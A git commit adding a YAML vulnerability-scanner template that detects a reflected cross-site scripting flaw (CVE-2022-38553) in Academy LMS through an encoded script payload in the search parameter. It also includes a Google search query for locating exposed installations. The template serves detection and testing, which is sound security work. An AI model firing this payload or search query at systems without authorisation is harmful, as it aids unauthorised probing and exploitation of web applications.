Merge pull request #5509 from edoardottt/CVE-2022-38553

Add CVE-2022-38553
2022-10-01 14:10:48 +05:30 · 2022-10-01 14:10:48 +05:30 · 8216005cc7
parent 9588d0c2f9 4aa1040202
commit 8216005cc7
1 changed files with 41 additions and 0 deletions
--- a/cves/2022/CVE-2022-38553.yaml
+++ b/cves/2022/CVE-2022-38553.yaml
@ -0,0 +1,41 @@
+id: CVE-2022-38553
+
+info:
+  name: Academy Learning Management System < v5.9.1 - Reflected XSS
+  author: edoardottt
+  severity: medium
+  description: |
+    Academy Learning Management System before v5.9.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Search parameter.
+  reference:
+    - https://www.youtube.com/watch?v=yFiZffHoeKs&ab_channel=4websecurity
+    - https://github.com/4websecurity/CVE-2022-38553
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-38553
+  classification:
+    cve-id: CVE-2022-38553
+  metadata:
+    verified: true
+    google-query: intext:"Study any topic, anytime"
+  tags: cve,cve2022,academylms,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"><script>alert(document.domain)</script>'
+          - 'Study any topic'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - 'text/html'
+
+      - type: status
+        status:
+          - 200